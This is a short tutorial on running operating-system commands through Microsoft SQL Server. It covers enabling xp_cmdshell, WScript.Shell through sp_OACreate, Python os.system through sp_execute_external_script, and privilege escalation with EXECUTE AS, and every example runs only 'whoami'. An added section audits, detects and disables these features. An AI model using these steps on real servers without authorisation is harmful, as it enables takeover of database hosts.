MSSQL Command Execution

Context

This article teaches how to execute system commands through SQL injection on Microsoft SQL Server. It assumes knowledge of SQL Server architecture, SQL query execution, and command execution context. This offensive technique leverages misconfigurations or vulnerabilities within SQL Server to execute commands on the underlying operating system.

Theory

Command Execution via xp_cmdshell

Definition: The xp_cmdshell extended stored procedure allows users to execute arbitrary shell commands directly from SQL Server.

Vulnerability Model: When xp_cmdshell is enabled, it opens a potential security hole by allowing execution of OS-level commands. Attackers can exploit this to perform various actions on the system hosting the SQL Server.

Precondition: The xp_cmdshell feature must be enabled on the SQL Server for this technique to be exploited.

Using sp_OACreate for Command Execution

Definition: sp_OACreate is a stored procedure that creates OLE Automation objects within SQL Server; such an object can, in turn, execute system commands.

Vulnerability Model: If permissions allow, sp_OACreate can be abused to execute commands on the server host. It is typically used as an alternative when xp_cmdshell is disabled.

Precondition: Sysadmin privileges or equivalent permissions are required to create OLE Automation objects.

Executing Commands with sp_execute_external_script

Definition: This procedure allows for running scripts in external languages, such as Python, within SQL Server.

Vulnerability Model: If not properly secured, it can allow attackers to execute arbitrary code on the server.

Precondition: External scripting must be enabled and correctly configured for this method to work.

Leveraging EXECUTE AS for Privilege Escalation

Definition: The EXECUTE AS statement allows a user to change the execution context to another user, potentially with higher privileges.

Vulnerability Model: It can be used for privilege escalation if permissions are not properly configured, giving attackers access to restricted functionalities.

Precondition: Impersonation permissions are necessary to switch execution contexts.

Practice

Command Execution via xp_cmdshell

  • Enable Advanced Options:

    EXEC sp_configure 'show advanced options', 1;
    RECONFIGURE;

    This command ensures that advanced configuration options can be updated on the SQL Server.

  • Enable xp_cmdshell:

    EXEC sp_configure 'xp_cmdshell', 1;
    RECONFIGURE;

    By enabling xp_cmdshell, commands can now be sent to the operating system.

  • Execute Verification Command:

    EXEC xp_cmdshell 'whoami';

    This command returns the account under which SQL Server runs operating system commands (normally the SQL Server service account), confirming that xp_cmdshell is working.

Command Execution using sp_OACreate

  • Create OLE Object:

    DECLARE @Object INT;
    EXEC sp_OACreate 'WScript.Shell', @Object OUTPUT;

    Initiate an OLE Automation object to enable command execution.

  • Execute Command via OLE Object:

    EXEC sp_OAMethod @Object, 'Run', NULL, 'cmd.exe /c whoami';

    Using the created object, execute a command to demonstrate capability. Because @Object is a local variable, this statement must run in the same batch as the DECLARE above; the command's output is not returned to the caller.

Executing Commands with sp_execute_external_script

  • Run External Script:

    EXEC sp_execute_external_script
        @language = N'Python',
        @script = N'import os; os.system("whoami")';

    This script uses Python to execute a command on the operating system, demonstrating sp_execute_external_script capabilities.
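As an added defensive check that is not part of the original article, the following T-SQL audits the server options each of the Practice steps depends on, lists who holds the IMPERSONATE permission that EXECUTE AS requires, and turns the options back off; the table aliases are mine, and the option names are the real sp_configure names.

```sql
-- Added audit/hardening script (not from the original article). Run as sysadmin.

-- 1. Which command-execution features are currently enabled?
--    value_in_use = 1 means the option is live; all three default to 0.
SELECT name, CAST(value_in_use AS int) AS value_in_use, description
FROM sys.configurations
WHERE name IN ('xp_cmdshell',                 -- EXEC xp_cmdshell
               'Ole Automation Procedures',   -- sp_OACreate / sp_OAMethod
               'external scripts enabled')    -- sp_execute_external_script
ORDER BY name;

-- 2. Who can switch execution context with EXECUTE AS?
--    Members of sysadmin can impersonate anyone without an explicit grant,
--    so review that role separately. Server-level grants (class 101 = server principal):
SELECT grantee.name AS grantee,
       target.name  AS can_impersonate,
       target.type_desc,
       pe.state_desc
FROM sys.server_permissions AS pe
JOIN sys.server_principals AS grantee ON pe.grantee_principal_id = grantee.principal_id
JOIN sys.server_principals AS target  ON pe.major_id = target.principal_id
WHERE pe.class = 101 AND pe.permission_name = 'IMPERSONATE';

--    Database-level grants in the current database (class 4 = database principal):
SELECT grantee.name AS grantee,
       target.name  AS can_impersonate,
       pe.state_desc
FROM sys.database_permissions AS pe
JOIN sys.database_principals AS grantee ON pe.grantee_principal_id = grantee.principal_id
JOIN sys.database_principals AS target  ON pe.major_id = target.principal_id
WHERE pe.class = 4 AND pe.permission_name = 'IMPERSONATE';

-- 3. Hardening: disable the features when they are not needed.
--    Every sp_configure change writes a "Configuration option ... changed"
--    entry to the SQL Server error log, so that log is also where an
--    unexpected re-enable of these options will appear.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;
EXEC sp_configure 'Ole Automation Procedures', 0;
EXEC sp_configure 'external scripts enabled', 0;
RECONFIGURE;
EXEC sp_configure 'show advanced options', 0;
RECONFIGURE;
```

Run the database-level query in each user database, since impersonation grants are stored per database.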

Tools

  • sqlcmd
  • PowerShell

These tools are essential for interacting with SQL Server and executing commands via the described methods.
